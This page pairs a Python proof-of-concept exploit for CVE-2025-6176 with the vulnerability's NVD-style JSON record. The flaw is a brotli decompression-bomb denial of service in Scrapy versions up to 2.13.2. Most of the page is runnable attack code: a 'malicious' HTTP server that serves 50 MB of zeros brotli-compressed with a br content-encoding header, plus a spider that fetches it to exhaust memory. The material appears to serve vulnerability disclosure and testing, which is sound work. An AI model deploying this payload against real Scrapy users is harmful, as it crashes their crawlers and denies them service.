CVE-2025-6176

#!/usr/bin/env python3 """ CVE-2025-6176 PoC - Scrapy Brotli Decompression DoS This PoC demonstrates how a malicious server can cause Scrapy to consume excessive memory by sending a specially crafted brotli-compressed response. """ import http.server import brotli import os import threading class MaliciousHandler(http.server.BaseHTTPRequestHandler): """Handler that serves malicious brotli-compressed content""" def do_GET(self): # Generate zero-filled data (highly compressible by brotli) # A small amount of data expands to huge size during decompression original_data = b'\x00' * (50 * 1024 * 1024) # 50MB of zeros # Compress with brotli - achieves extreme compression ratio compressed_data = brotli.compress(original_data) print(f"[+] Original size: {len(original_data)} bytes") print(f"[+] Compressed size: {len(compressed_data)} bytes") print(f"[+] Compression ratio: {len(original_data)/len(compressed_data):.1f}:1") # Send response with brotli encoding self.send_response(200) self.send_header('Content-Type', 'text/html') self.send_header('Content-Encoding', 'br') self.send_header('Content-Length', len(compressed_data)) self.end_headers() self.wfile.write(compressed_data) def log_message(self, format, *args): pass def start_malicious_server(port=8888): """Start the malicious HTTP server""" server = http.server.HTTPServer(('0.0.0.0', port), MaliciousHandler) print(f"[+] Malicious server running on port {port}") server.serve_forever() def test_with_scrapy(): """ Test case using Scrapy to demonstrate the vulnerability Run this in a separate process after starting the malicious server """ import scrapy from scrapy.crawler import CrawlerProcess class VulnerableSpider(scrapy.Spider): name = 'vulnerable_spider' start_urls = ['http://localhost:8888/'] def parse(self, response): self.logger.info(f"Received response: {len(response.body)} bytes") process = CrawlerProcess() process.crawl(VulnerableSpider) process.start() if __name__ == '__main__': # Start malicious server in background thread server_thread = threading.Thread(target=start_malicious_server, daemon=True) server_thread.start() print("\n[!] This PoC demonstrates the vulnerability.") print("[!] In real attack scenarios, the attacker controls the server") print("[!] and tricks Scrapy clients into fetching the malicious content.") print("[!] The decompression will consume excessive memory.") # Keep server running try: server_thread.join() except KeyboardInterrupt: pass

{"cve": {"id": "CVE-2025-6176", "sourceIdentifier": "[email protected]", "published": "2025-10-31T00:15:37.333", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Scrapy versions up to 2.13.2 are vulnerable to a denial of service (DoS) attack due to a flaw in its brotli decompression implementation. The protection mechanism against decompression bombs fails to mitigate the brotli variant, allowing remote servers to crash clients with less than 80GB of available memory. This occurs because brotli can achieve extremely high compression ratios for zero-filled data, leading to excessive memory consumption during decompression."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://huntr.com/bounties/2c26a886-5984-47ee-a421-0d5fe1344eb0", "source": "[email protected]"}]}}